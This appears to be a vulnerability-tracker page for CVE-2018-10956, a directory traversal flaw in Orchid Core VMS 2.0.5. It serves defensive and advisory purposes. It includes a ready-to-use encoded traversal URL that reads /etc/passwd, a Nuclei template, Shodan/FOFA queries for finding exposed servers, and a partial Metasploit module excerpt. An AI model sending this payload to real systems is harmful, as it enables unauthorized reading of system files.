CVE-2018-10956
published 2018-06-25CVE-2018-10956: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal.
PriorityP268high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
56.32%
98.9th percentile
IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ipconfigure | orchid_core_vms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
bytes↗
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F
sigma
id: CVE-2018-10956
info:
name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
http:
- method: GET
path:
- "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200- →Detect unauthenticated HTTP GET requests containing URL-encoded directory traversal sequences (%2e%2e%2f or %2E%2E%2F) in the request path targeting the Orchid Core VMS web server. ↗
- →Use Shodan/FOFA queries to identify exposed Orchid Core VMS instances: http.title:"Orchid Core VMS" or title="orchid core vms".
- →Match HTTP 200 responses to traversal requests containing 'root:.*:0:0:' in the body, indicating successful /etc/passwd disclosure.
- →The exploit is unauthenticated; no session or authentication token is required. Flag any traversal attempt reaching the Orchid VMS base path without credentials. ↗
- ·The vulnerability is fixed in version 2.0.6; detections should be scoped to instances still running 2.0.5. ↗
- ·The Metasploit module defaults to RPORT 80 and TARGETURI '/'; adjust accordingly if the target runs on a non-standard port or path. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IPConfigure Orchid VMS 2.0.5 - Directory Traversal / Information Disclosure (Metasploit)
exploitdb·2018-06-20
CVE-2018-10956 IPConfigure Orchid VMS 2.0.5 - Directory Traversal / Information Disclosure (Metasploit)
IPConfigure Orchid VMS 2.0.5 - Directory Traversal / Information Disclosure (Metasploit)
---
require 'msf/core'
class MetasploitModule 'IPConfigure Orchid VMS %q{
Orchid Core VMS is vulnerable to a directory traversal attack. This affects Linux and Windows operating systems. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the sudoers group. As such, any file on the underlying system, for which the location is known, can be read.
This module was tested against 2.0.5. This has been fixed in 2.0.6.
},
'Author' => [ 'Sanjiv Kawa @
Nuclei
IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2018-10956 [HIGH] IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.
Template:
id: CVE-2018-10956
info:
name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.
impact: |
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
remediation: |
Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability.
reference:
- https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
- https://github.com/nettitude/me
No writeups or analysis indexed.
http://packetstormsecurity.com/files/148274/IPConfigure-Orchid-VMS-2.0.5-Directory-Traversal-Information-Disclosure.htmlhttps://www.exploit-db.com/exploits/44916/http://packetstormsecurity.com/files/148274/IPConfigure-Orchid-VMS-2.0.5-Directory-Traversal-Information-Disclosure.htmlhttps://www.exploit-db.com/exploits/44916/
2018-06-25
Published